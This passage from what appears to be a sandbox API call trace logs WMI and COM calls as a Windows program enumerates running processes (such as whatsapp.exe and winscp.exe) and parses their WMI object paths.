Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.581] IUnknown:Release (This=0x5ebd04c) returned 0x3 [0225.581] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.581] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.581] IUnknown:QueryInterface (in: This=0x5ebd048, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.581] IUnknown:Release (This=0x5ebd048) returned 0x2 [0225.581] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.581] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.581] IUnknown:QueryInterface (in: This=0x5ebd048, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ebd048) returned 0x0 [0225.581] IUnknown:AddRef (This=0x5ebd048) returned 0x4 [0225.581] IUnknown:Release (This=0x5ebd048) returned 0x3 [0225.581] IUnknown:Release (This=0x5ebd048) returned 0x2 [0225.581] CoTaskMemFree (pv=0x5eca648) [0225.581] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.581] IUnknown:AddRef (This=0x5ebd048) returned 0x3 [0225.581] IWbemClassObject:Get (in: This=0x5ebd048, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.582] IWbemClassObject:Get (in: This=0x5ebd048, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2344\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.582] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2344\"") returned 0x66 [0225.582] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2344\"") returned 0x66 [0225.582] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.582] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.582] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.582] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.583] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5eca648) returned 0x0 [0225.583] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eca648, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.583] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5eca648, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5ec2ae8) returned 0x0 [0225.583] WbemDefPath:IUnknown:Release (This=0x5eca648) returned 0x0 [0225.583] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2ae8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5ec2ae8) returned 0x0 [0225.583] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2ae8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.584] WbemDefPath:IUnknown:AddRef (This=0x5ec2ae8) returned 0x3 [0225.584] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2ae8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.584] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2ae8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.584] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2ae8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5eca658) returned 0x0 [0225.584] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5eca658, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.584] WbemDefPath:IUnknown:Release (This=0x5eca658) returned 0x3 [0225.584] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.584] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.584] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2ae8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.584] WbemDefPath:IUnknown:Release (This=0x5ec2ae8) returned 0x2 [0225.584] WbemDefPath:IUnknown:Release (This=0x5ec2ae8) returned 0x1 [0225.584] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.584] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.584] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2ae8, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5ec2ae8) returned 0x0 [0225.584] WbemDefPath:IUnknown:AddRef (This=0x5ec2ae8) returned 0x3 [0225.584] WbemDefPath:IUnknown:Release (This=0x5ec2ae8) returned 0x2 [0225.584] WbemDefPath:IWbemPath:SetText (This=0x5ec2ae8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2344\"") returned 0x0 [0225.584] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.584] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.584] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.585] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.585] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.585] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.585] IWbemClassObject:Get (in: This=0x5ebd048, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f8e70*=0, plFlavor=0x26f8e74*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="whatsapp.exe", varVal2=0x0), pType=0x26f8e70*=8, plFlavor=0x26f8e74*=0) returned 0x0 [0225.585] SysStringByteLen (bstr="whatsapp.exe") returned 0x18 [0225.585] SysStringByteLen (bstr="whatsapp.exe") returned 0x18 [0225.585] IWbemClassObject:Get (in: This=0x5ebd048, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f8e70*=8, plFlavor=0x26f8e74*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="whatsapp.exe", varVal2=0x0), pType=0x26f8e70*=8, plFlavor=0x26f8e74*=0) returned 0x0 [0225.585] SysStringByteLen (bstr="whatsapp.exe") returned 0x18 [0225.585] SysStringByteLen (bstr="whatsapp.exe") returned 0x18 [0225.585] CoTaskMemAlloc (cb=0x4) returned 0x5eca688 [0225.585] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5eca688, puReturned=0x26dde18 | out: apObjects=0x5eca688*=0x5eccc40, puReturned=0x26dde18*=0x1) returned 0x0 [0225.586] IUnknown:QueryInterface (in: This=0x5eccc40, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5eccc40) returned 0x0 [0225.586] IUnknown:QueryInterface (in: This=0x5eccc40, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.586] IUnknown:QueryInterface (in: This=0x5eccc40, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.586] IUnknown:AddRef (This=0x5eccc40) returned 0x3 [0225.587] IUnknown:QueryInterface (in: This=0x5eccc40, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.587] IUnknown:QueryInterface (in: This=0x5eccc40, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.587] IUnknown:QueryInterface (in: This=0x5eccc40, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5eccc44) returned 0x0 [0225.587] IMarshal:GetUnmarshalClass (in: This=0x5eccc44, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.587] IUnknown:Release (This=0x5eccc44) returned 0x3 [0225.587] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.587] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.587] IUnknown:QueryInterface (in: This=0x5eccc40, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.587] IUnknown:Release (This=0x5eccc40) returned 0x2 [0225.587] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.587] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.587] IUnknown:QueryInterface (in: This=0x5eccc40, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5eccc40) returned 0x0 [0225.587] IUnknown:AddRef (This=0x5eccc40) returned 0x4 [0225.587] IUnknown:Release (This=0x5eccc40) returned 0x3 [0225.587] IUnknown:Release (This=0x5eccc40) returned 0x2 [0225.587] CoTaskMemFree (pv=0x5eca688) [0225.587] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.587] IUnknown:AddRef (This=0x5eccc40) returned 0x3 [0225.587] IWbemClassObject:Get (in: This=0x5eccc40, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.588] IWbemClassObject:Get (in: This=0x5eccc40, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2352\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.588] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2352\"") returned 0x66 [0225.588] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2352\"") returned 0x66 [0225.588] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.588] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.588] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.588] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.589] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5eca688) returned 0x0 [0225.589] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eca688, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.589] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5eca688, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5ec2bc8) returned 0x0 [0225.589] WbemDefPath:IUnknown:Release (This=0x5eca688) returned 0x0 [0225.589] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2bc8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5ec2bc8) returned 0x0 [0225.589] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2bc8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.590] WbemDefPath:IUnknown:AddRef (This=0x5ec2bc8) returned 0x3 [0225.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2bc8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2bc8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2bc8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5eca698) returned 0x0 [0225.590] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5eca698, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.590] WbemDefPath:IUnknown:Release (This=0x5eca698) returned 0x3 [0225.590] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.590] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2bc8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.590] WbemDefPath:IUnknown:Release (This=0x5ec2bc8) returned 0x2 [0225.590] WbemDefPath:IUnknown:Release (This=0x5ec2bc8) returned 0x1 [0225.590] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.590] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2bc8, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5ec2bc8) returned 0x0 [0225.590] WbemDefPath:IUnknown:AddRef (This=0x5ec2bc8) returned 0x3 [0225.590] WbemDefPath:IUnknown:Release (This=0x5ec2bc8) returned 0x2 [0225.590] WbemDefPath:IWbemPath:SetText (This=0x5ec2bc8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2352\"") returned 0x0 [0225.590] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.590] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.590] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.590] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.590] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.591] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.591] IWbemClassObject:Get (in: This=0x5eccc40, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f96e4*=0, plFlavor=0x26f96e8*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="winscp.exe", varVal2=0x0), pType=0x26f96e4*=8, plFlavor=0x26f96e8*=0) returned 0x0 [0225.591] SysStringByteLen (bstr="winscp.exe") returned 0x14 [0225.591] SysStringByteLen (bstr="winscp.exe") returned 0x14 [0225.591] IWbemClassObject:Get (in: This=0x5eccc40, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f96e4*=8, plFlavor=0x26f96e8*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="winscp.exe", varVal2=0x0), pType=0x26f96e4*=8, plFlavor=0x26f96e8*=0) returned 0x0 [0225.591] SysStringByteLen (bstr="winscp.exe") returned 0x14 [0225.591] SysStringByteLen (bstr="winscp.exe") returned 0x14 [0225.591] CoTaskMemAlloc (cb=0x4) returned 0x5eca6c8 [0225.591] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5eca6c8, puReturned=0x26dde18 | out: apObjects=0x5eca6c8*=0x5eccdd8, puReturned=0x26dde18*=0x1) returned 0x0 [0225.592] IUnknown:QueryInterface (in: This=0x5eccdd8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5eccdd8) returned 0x0 [0225.592] IUnknown:QueryInterface (in: This=0x5eccdd8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.592] IUnknown:QueryInterface (in: This=0x5eccdd8, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.592] IUnknown:AddRef (This=0x5eccdd8) returned 0x3 [0225.592] IUnknown:QueryInterface (in: This=0x5eccdd8, 